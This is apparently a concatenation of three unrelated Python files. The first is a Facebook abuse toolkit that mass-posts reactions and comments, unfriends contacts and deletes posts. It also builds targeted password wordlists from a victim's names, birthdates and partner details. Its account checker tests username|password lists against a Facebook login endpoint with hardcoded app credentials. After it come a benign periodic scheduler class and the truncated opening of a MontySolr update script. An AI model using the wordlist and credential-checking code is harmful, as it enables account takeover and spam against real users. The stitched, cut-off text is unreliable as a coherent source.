oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
        print '\x1b[1;91m[!] Can\'t be empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
            print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
    piro = 0
    for p in asus['data']:
        id = p['id']
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
        print '\x1b[1;91m[!] No friend requests'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
            print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Success'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
        print '\x1b[1;91m[!] Can\'t be empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
        print '\x1b[1;91m[!] Can\'t be empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
            print '\x1b[1;91m[?] \x1b[1;92mFill in the target data below'
print 52 * '\x1b[1;97m\xe2\x95\x90'
            a = raw_input('\x1b[1;91m[+] \x1b[1;92mFirst Name \x1b[1;97m: ')
            file = open(a + '.txt', 'w')
            b = raw_input('\x1b[1;91m[+] \x1b[1;92mMiddle Name \x1b[1;97m: ')
            c = raw_input('\x1b[1;91m[+] \x1b[1;92mLast Name \x1b[1;97m: ')
            d = raw_input('\x1b[1;91m[+] \x1b[1;92mNickname \x1b[1;97m: ')
            e = raw_input('\x1b[1;91m[+] \x1b[1;92mDate of Birth >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
            print '\x1b[1;91m[?] \x1b[1;93mIf single, just SKIP :v'
            i = raw_input('\x1b[1;91m[+] \x1b[1;92mPartner Name \x1b[1;97m: ')
            j = raw_input('\x1b[1;91m[+] \x1b[1;92mPartner Nickname \x1b[1;97m: ')
            k = raw_input('\x1b[1;91m[+] \x1b[1;92mPartner Date of Birth >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
            print '\x1b[1;91m[!] Failed to create file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
        print '\x1b[1;91m[?] \x1b[1;92mFile contents\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
periodical_local_shell.py
|
import logging
import threading
from time import time, sleep
from planteye_vision.shell.shell import Shell
from planteye_vision.configuration.shell_configuration import PeriodicalLocalShellConfiguration
class PeriodicalLocalShell(Shell):
"""
This class describes a local shell that requests data periodically
"""
def __init__(self, config: PeriodicalLocalShellConfiguration):
self.config = config
self.time_scheduler = None
self.callback = None
def apply_configuration(self):
self.time_scheduler = TimeScheduler(self.config.parameters['time_interval'], self.execution_step)
self.time_scheduler.start()
def attach_callback(self, callback):
self.callback = callback
def execution_step(self):
self.callback()
class TimeScheduler:
def __init__(self, time_interval: float, executed_function):
self.time_interval = time_interval
self.executed_function = executed_function
self.thread = None
self.stop_flag = False
def start(self):
self.stop_flag = False
self.thread = threading.Thread(target=self.executable, args=[])
self.thread.start()
def stop(self):
self.stop_flag = True
def executable(self):
        # start from now so the first step is not spuriously reported as skipped
        expected_step_end = time()
while not self.stop_flag:
print('Loop step %f' % time())
logging.info('Shell execution step')
step_begin = time()
expected_step_end = expected_step_end + self.time_interval / 1000.0
print('Step begin %f' % step_begin)
print('Expected step end %f' % expected_step_end)
if step_begin > expected_step_end:
logging.error('Shell execution step skipped (consider increasing interval)')
print('Skip step')
continue
print('Execute step')
logging.info('Shell execution step began')
self.executed_function()
step_duration = time() - step_begin
debug_str = 'Shell execution step duration %i ms' % int(step_duration * 1000)
logging.debug(debug_str)
print('End step %f' % time())
print('Step execution duration %f' % step_duration)
if time() > expected_step_end:
print('Step execution longer than interval')
logging.warning('Shell execution step took longer (' + str(step_duration) + ') than given time interval ' + '(' + str(self.time_interval) + ')')
else:
print('Sleep for %f' % max(expected_step_end-time(), 0))
sleep(max(expected_step_end-time(), 0))
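# Minimal usage sketch (illustrative; the no-argument configuration constructor
# is an assumption, while the 'time_interval' parameter (milliseconds) and the
# attach/apply calls follow the classes above):
#
#   config = PeriodicalLocalShellConfiguration()
#   config.parameters = {'time_interval': 1000}
#   shell = PeriodicalLocalShell(config)
#   shell.attach_callback(lambda: logging.info('capture step'))
#   shell.apply_configuration()          # starts the TimeScheduler thread
#   ...
#   shell.time_scheduler.stop()          # ask the loop to stop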
|
montysolrupdate.py
|
#!/usr/bin/env python
"""An assistant for updating MontySolr releases.
This script will update the codebase of MontySolr ON the machine(s)
that run it. This script is to be executed unattended and very often.
Here are the assumptions under which we work:
- PATH contains correct versions of ant, java, javac, git
- we have internet access
- we have write access to INSTDIR (/var/lib/montysolr)
- the INSTDIR already exists
- we run as user 'montysolr'
- we fetch tags from git
- the tags MUST be in a special format
        <SOLR-MAJOR><SOLR-MINOR>.<MAJOR>.<MINOR>.<PATCH-INCREMENT>
We are tracking SOLR versions, therefore the first two numbers
correspond to the version of SOLR that is currently used by
MONTYSOLR
Here is what happens when respective numbers change:
SOLR-VER : version is made of Major+Minor, ie. 40, on change
everything is nuked, montysolr is completely rebuilt,
index is forgotten
MAJOR : major bump in MontySolr, the same behaviour as above
MINOR : only java modules are recompiled
the solr configs are replaced, index is forgotten
PATCH : all java modules are recompiled, solr configs replaced
with the new version, index is re-used
If all these conditions are met, we'll do the following
1. use git to fetch the latest tags
2. compare the latest tag against the current installed version
3. rebuild montysolr, do the necessary compilation, and setup
4. IFF we have the live-instance name
4.1 stop it (if it runs)
4.2 replace the symbolic link (live-5002 -> live-5002-<release-tag>)
4.3 point the index (live-5002/index -> live-5002-index-<increment>)
4.4 remove the index data IFF the difference in incr. version is > 2
tests are inside: test_montysolrupdate.py
"""
import sys
import os
import hashlib
import optparse
import re
import subprocess
import shutil
import re
import json
import urllib
import time
import socket
import threading
import Queue
import traceback
from contextlib import contextmanager
COMMASPACE = ', '
SPACE = ' '
tag_cre = re.compile(r'v?(\d+)\.(\d+)\.(\d+)\.(\d+)$')
INSTDIR = os.environ.get('MONTYSOLR_HOME','/var/lib/montysolr')
INSTNAME = os.environ.get('MONTYSOLR_EXAMPLE_NAME','adsabs')
GITURL = os.environ.get('MONTYSOLR_GIT','https://github.com/romanchyla/montysolr.git') #where to get the latest code from
NEW_INSTANCE_PORT_GAP = os.environ.get('MONTYSOLR_URL_GAP',10) #when we build a new release, it will be started as orig_port+GAP
START_ARGS = os.environ.get('START_ARGS','')
START_JVMARGS = os.environ.get('START_JVMARGS','')
PYTHON_RELEASE = os.environ.get('MONTYSOLR_PYTHON_RELEASE','2')
UPDATER_RELEASE = os.environ.get('MONTYSOLR_UPDATER_RELEASE','3')
ANT_HOME = os.environ.get('ANT_HOME','/usr/share/ant')
JAVA_HOME = os.environ.get('JAVA_HOME','/usr/lib/jvm/java-7-openjdk-amd64')
if "check_output" not in dir( subprocess ): # duck punch it in!
def f(*popenargs, **kwargs):
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd)
return output
subprocess.check_output = f
def error(*msgs):
sys.stderr.write("**ERROR**\n")
for msg in msgs:
sys.stderr.write(msg)
sys.stderr.write("\n")
sys.exit(1)
def run_cmd(args, silent=False, strict=True):
cmd = SPACE.join(map(str, args))
if not silent:
print('$ %s' % cmd)
try:
if silent:
